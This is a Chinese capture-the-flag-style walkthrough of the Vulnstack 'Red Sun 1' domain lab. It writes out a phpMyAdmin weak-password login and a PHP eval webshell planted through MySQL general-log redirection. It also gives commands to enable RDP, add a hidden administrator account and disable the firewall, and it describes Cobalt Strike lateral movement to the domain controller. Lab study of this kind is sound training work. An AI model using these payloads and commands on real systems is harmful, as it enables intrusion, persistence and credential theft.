红日靶场1

红日靶场1渗透测试实战,包含外网信息收集、Web渗透、内网横向移动、域控提权等完整攻击链。

下载地址

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

红日靶场1
图注:红日靶场1

登录密码:hongrisec@2019

环境配置

主机 版本 内网 IP 外网 IP
WEB win7 192.168.52.143 192.168.111.129
PC win03 192.168.52.141
DC win08 192.168.52.138

网络环境设置

详细步骤见:网络环境搭建

新建两个网卡

新建网卡
图注:新建网卡

为主机添加对应网卡,注意win7要双网卡,两个网段模拟内外网

注意:第一网卡连内网

配置网卡
图注:配置网卡

为攻击机添加外网网卡

攻击机网卡
图注:攻击机网卡
网络配置
图注:网络配置

开启Web机器的Web服务

开启Web服务
图注:开启Web服务

拓扑图

网络拓扑图
图注:网络拓扑图

设置完毕后VM1、VM2、VM3就在同一内网中了,只有VM1web服务器能够访问内网,所以要想访问win2008和win2003服务器必须要先拿下win7服务器,用它做跳板进内网进行横向渗透。

外网渗透

信息收集

nmap 192.168.111.0/24
nmap扫描
图注:nmap扫描

查看网页

网页首页
图注:网页首页

没有发现什么信息,进行目录扫描

dirsearch -u "192.168.111.129"
目录扫描
图注:目录扫描

发现phpmyadmin,弱口令登录root/root

phpMyAdmin登录
图注:phpMyAdmin登录

phpMyAdmin 是广泛使用的 MySQL 管理工具,历史上存在过多个高危漏洞。

Get Shell

查看日志是否开启

 show variables like '%general%';
查看日志配置
图注:查看日志配置

开启日志,并更改日志路径

set global general_log=on;
set global general_log_file='C:/phpStudy/WWW/a.php';
开启日志
图注:开启日志
更改日志路径
图注:更改日志路径

写入一句话木马

select '<?php @eval($_POST[a]);?>'
写入木马
图注:写入木马

使用蚁剑进行连接

蚁剑的下载安装:AntSword下载安装步骤

蚁剑配置
图注:蚁剑配置
蚁剑连接
图注:蚁剑连接

发现目录中有yxcms

发现yxcms
图注:发现yxcms
yxcms配置
图注:yxcms配置

有用户名和密码,登录查看管理后台

登录后台
图注:登录后台

在前台模板->管理模板文件->index_index.php处可编辑,插入PHP代码

编辑模板
图注:编辑模板

插入phpinfo()

执行代码
图注:执行代码

执行成功,如果插入一句话木马,也可以getshell

内网渗透

方法1:远程登录

尝试使用3389端口远程登录

远程登录
图注:远程登录

没有开启,手动开启一下

我们使用以下命令开启它(win7、win2003、winxp),运行后显示3389端口已经成功开启(关闭命令把如下0都换成1)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
开启3389
图注:开启3389

我们在此创建一个新用户,因为作为攻击者,我们不知道管理员的密码

net user attack !QAZ2wsx /add 
net localgroup administrators attack /add 
net user attack
创建用户
图注:创建用户

新用户成功提权为管理员

通过msf反弹shell关闭防火墙,然后使用远程桌面连接

msf玩法:1.MSF工具渗透工具  2.MS17_010复现

由于我没有关闭了本机远程桌面,暂时不演示

方法2:Cobalt Strike

cs的配置:CobaltStrike的下载及开启

设置监听器

设置监听器
图注:设置监听器
监听器配置
图注:监听器配置

生成后门木马

生成木马
图注:生成木马
木马配置
图注:木马配置
保存木马
图注:保存木马

通过蚁剑上传木马,直接拖入即可

上传木马
图注:上传木马

在命令行运行

运行木马
图注:运行木马

cs成功上线

上线成功
图注:上线成功

横向移动

关闭防火墙

shell netsh advfirewall set allprofile state off
关闭防火墙
图注:关闭防火墙

端口扫描

端口扫描
图注:端口扫描
扫描结果
图注:扫描结果

提权

提权
图注:提权

获取密码

获取密码
图注:获取密码
密码哈希
图注:密码哈希

获得了system权限

system权限
图注:system权限

新建监听器

新建监听器
图注:新建监听器
监听器配置
图注:监听器配置
横向渗透
图注:横向渗透

上线成功

上线成功
图注:上线成功

拿下域控

拿下域控
图注:拿下域控

192.168.52.143同理

总结

渗透流程

环境搭建

  1. 网络拓扑:搭建了模拟真实企业内网环境的靶场
    • WEB服务器(Win7):双网卡配置,连接外网和内网
    • PC主机(Win2003):仅内网
    • 域控(Win2008):仅内网
  2. 攻击策略:需先拿下作为跳板的Win7 WEB服务器,才能横向渗透内网其他主机

外网渗透阶段

  1. 信息收集
    • 使用nmap扫描发现目标主机192.168.111.129
    • 访问网页初步侦察
    • 使用dirsearch进行目录扫描,发现phpmyadmin
  2. 漏洞利用与Get Shell
    • 利用phpMyAdmin弱口令(root/root)登录
    • 通过MySQL日志写入一句话木马获取Webshell
    • 配置蚁剑进行连接和管理
    • 另外发现了yxcms系统,通过模板编辑功能也可写入恶意代码

内网渗透阶段

通过Cobalt Strike进行内网横向移动:

  1. 建立据点
    • 在CS中设置监听器
    • 生成后门木马并通过蚁剑上传
    • 成功获取Win7主机的权限
  2. 横向移动
    • 关闭防火墙:netsh advfirewall set allprofile state off
    • 进行端口扫描,发现内网其他主机
    • 提权获取system权限
    • 获取系统密码凭证
  3. 拿下域控
    • 创建新的监听器用于横向渗透
    • 利用获取的凭证登录其他内网主机
    • 成功拿下PC(192.168.52.141)和域控(192.168.52.138)
    • 获取域控最高权限
文章评论